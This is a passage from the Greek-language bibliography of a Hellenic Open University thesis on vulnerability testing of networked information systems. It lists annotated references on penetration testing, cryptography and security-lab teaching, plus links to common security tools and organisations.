• Melbourne J., Jorm D., Penetration Testing for Web Applications, Security Focus, June 2003. [Παρουσιάζονται οι ευπάθειες των εφαρμογών ιστού και καταδεικνύονται οι τρόποι με τους οποίους οι επιτιθέμενοι μπορούν να τις εκμεταλλευτούν ώστε να αποκτήσουν πρόσβαση σε αυτές. Αυτές οι ευπάθειες απαιτείται να είναι και το αντικείμενο ελέγχου τρωτότητας μιας εφαρμογής ιστού].

• National Institute of Standards and Technology, Technical Guide to Information Security Testing and Assessment, NIST Special Publication 800-115, USA, October 2008. [Παρουσιάζονται συγκεκριμένες τεχνικές σε συνδυασμό με τα οφέλη και τους περιορισμούς τους για το σχεδιασμό, την εφαρμογή, και τη συντήρηση τεχνικών πληροφοριών σχετικά με τους ελέγχους ασφάλειας και την αξιολόγηση επικινδυνότητας ενός ΠΣ.].

• Whittaker J., “Penetration Testing”, Security Briefs, Microsoft’s MSDN Magazine, May 2008. [Η αναγκαιότητα των ελέγχων τρωτότητας, ο σωστός σχεδιασμός τους, τα είδη των ελέγχων τα οποία είναι απαραίτητο να εκτελεστούν σε συνδυασμό με τα σημεία του λογισμικού και του περιβάλλοντός του στα οποία ενδέχεται να υπάρχουν ευπάθειες].

• Institute for Security and Open Methodologies, OSSTMM 3.0 Lite- Introduction and Sample to the Open Source Security Testing Methodology Manual, August 2009. [Είδη διενέργειας ελέγχων τρωτότητας].

• B. Schneier, Security Pitfalls in Cryptography, 1998. [Ένα κρυπτογραφικό σύστημα όσο ισχυρό και αν είναι δεν είναι αρκετό για να προστατέψει ένα ΠΣ το οποίο διαθέτει κενά ασφάλειας και ευπάθειες. Οι ευπάθειες δύναται να κρύβονται σε κάθε στοιχείο του και αφορούν τόσο στο σχεδιασμό, την υλοποίηση και τη συντήρησή του όσο και στην ίδια την επιλογή κρυπτοσυστήματος].

• B. Schneier, Why Cryptography Is Harder Than It Looks, 1997. [Η ισχυρή κρυπτογραφία μπορεί να αντισταθεί στις στοχευόμενες επιθέσεις μέχρι το σημείο το οποίο γίνεται ευκολότερη η υποκλοπή με άλλους τρόπους. Τρόπους που εκμεταλλεύονται τις ευπάθειες των ΠΣ].

• M. Une, M. Kanda, “Year 2010 issues on cryptographic algorithms”, Monetary and Economic

Studies, pp. 129-164, March 2007 [Κριτήρια για την επιλογή κρυπτοσυστήματος από έναν οργανισμό].

Page 304: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

304 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

• Joseph Migga Kizza, A Guide to Computer Network Security, Spinger-Verlag, London 2009. [Τρόποι επιθέσεων εισβολέων, Τοπολογίες επιθέσεων, Ιστορία του Hacking, Κίνητρα των Hackers]

• Orebaugh A, Pinkard B, “Nmap in the Enterprise Your Guide to Network Scanning”, Syngress Publishing, Inc., Burlington, 2008 [Δυνατότητες και τρόπος λειτουργίας του εργαλείου Nmap]

• Marsh, R. T., “Critical Foundations: Protecting America's Infrastructure,” President's Commission on Critical Infrastructure Protection, October 1997 [Η αναγκαιότητα ένταξης του μαθήματος της Ασφάλειας Πληροφοριακών Συστημάτων στην Ανώτατη Εκπαίδευση]

• Bishop M., “The State of INFOSEC Education in Academia: Present and Future,” in Proc. Information Systems Security Education National Colloquium, 1997, pp. 19-33 [Διαπίστωση της απουσίας ενός ολοκληρωμένου εργαστηριακού εκπαιδευτικού προγράμματος που να προσεγγίζει συνολικά τους τομείς Ασφάλειας των Πληροφοριακών Συστημάτων]

• Wright M., “The Need For Information Security,” Computer Fraud and Security, 1998, pp. 14-17 [Διαπίστωση της απουσίας ενός ολοκληρωμένου εργαστηριακού εκπαιδευτικού προγράμματος που να προσεγγίζει συνολικά τους τομείς Ασφάλειας των Πληροφοριακών Συστημάτων]

• Memon N., Padman V., Frankl P., Naumovich G., “Design and Implementation of an Information Security Laboratory,” Journal of Information Warfare, vol. 2, no. 3, 2003, pp. 60-71. [Βασικά χαρακτηριστικά ενός εργαστηρίου Ασφάλειας Πληροφοριακών Συστημάτων]

• Bishop, M. and Heberlein, L. T., “An Isolated Network for Research,” 19th National Information Systems Security Conference, Baltimore, MD, October 22-25, 1996, pp. 349-360. [Λόγοι που επιβάλουν την απομόνωση του εργαστηρίου Ασφάλειας Πληροφοριακών Συστημάτων από το υπόλοιπο δίκτυο ενός εκπαιδευτικού ιδρύματος και το διαδίκτυο]

• Carver C., Hill J., Humphries J., Pooch U., “Using an Isolated Network Laboratory to Teach Advanced Networks and Security,” ACM SIGCSE Bulletin, vol. 33, no. 1, 2001, pp. 36-40. [Λόγοι που επιβάλουν την απομόνωση του εργαστηρίου Ασφάλειας Πληροφοριακών Συστημάτων από το υπόλοιπο δίκτυο ενός εκπαιδευτικού ιδρύματος και το διαδίκτυο]

• Bulbrook H, “Using Virtual Machines to provide a secure Teaching Lab Environment”, Durham Technical Community College, 2008 [Η αξιοποίηση της τεχνολογίας των εικονικών μηχανών για την δημιουργία ενός απομονωμένου από το δίκτυο εργαστηρίου Ασφάλειας]

Page 305: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

305 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Ιστότοποι (Τελευταία επίσκεψη 4/4/2010) http://www.cert.org/stats/cert_stats.html#mail-messages-processed http://www.eccouncil.org/index.htm http://www.giac.org/ http://www.offensive-security.com/ http://www.cesg.gov.uk/ http://www.tigerscheme.org/ http://www.owasp.org/ http://www.isc2.org/ http://www.isaca.org/ http://en.wikipedia.org/wiki/ISO_27001 http://technet.microsoft.com/en-us/security/cc184923.aspx http://technet.microsoft.com/en-us/security/cc184922.aspx http://www.oxid.it/cain.html http://secunia.com/advisories/32794/ http://www.securitytube.net/Cain-and-Abel-Malformed-RDP-File-Buffer-Overflow-Vulnerability-video.aspx http://www.vupen.com/english/advisories/2009/0035 https://www.securestate.com/pages/fast-track.aspx http://www.metasploit.com/ http://technet.microsoft.com/en-us/security/cc185712.aspx http://www.nessus.org/nessus/ http://nmap.org/ http://www.parosproxy.org/index.shtml http://www.snort.org/ http://www.wireshark.org/ http://www.apachefriends.org/en/xampp.html http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10 http://www.omgsecurity.com/2009/06/blind-sql-injection-of-post-vars-with-sqlmap/#more-25 http://www.youtube.com/watch?v=nAWN989WA0A http://sectools.org/ http://www.backtrack-linux.org/ http://assets.sourcefire.com/snort/vrtwhitepapers/performance_rules_creation_1.pdf http://wiki.wireshark.org/CaptureSetup/NetworkMedia http://www.outpost9.com/files/WordLists.html http://ophcrack.sourceforge.net/tables.php http://scanme.insecure.org/

Page 306: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

306 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03